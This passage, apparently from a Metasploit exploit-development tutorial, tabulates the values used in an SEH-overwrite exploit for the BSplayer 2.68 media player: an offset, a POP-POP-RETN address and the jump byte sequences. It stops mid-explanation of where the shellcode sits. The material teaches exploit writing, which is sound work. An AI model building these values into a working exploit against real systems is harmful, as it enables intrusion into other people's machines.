Let's look at the following table that highlights all the necessary values and their usage:
Serial number |
Variable |
Value |
1 |
Offset value |
2048 |
2 |
Known location in memory containing POP-POP-RETN series of instructions/P-P-R address |
0x0000583b |
3 |
Backward jump/long jump to find the shellcode |
\xe9\x85\xe9\xff\xff |
4 |
Short jump/pointer to the next SEH frame |
\xeb\xf9\x90\x90 |
We now have all the essentials to build the Metasploit module for the BSplayer 2.68 application. We can see that the author has placed the shellcode precisely after 2048 NOPs. However, this does not mean that the actual offset value is 2048. The author of the exploit has placed it before the SEH overwrite because ...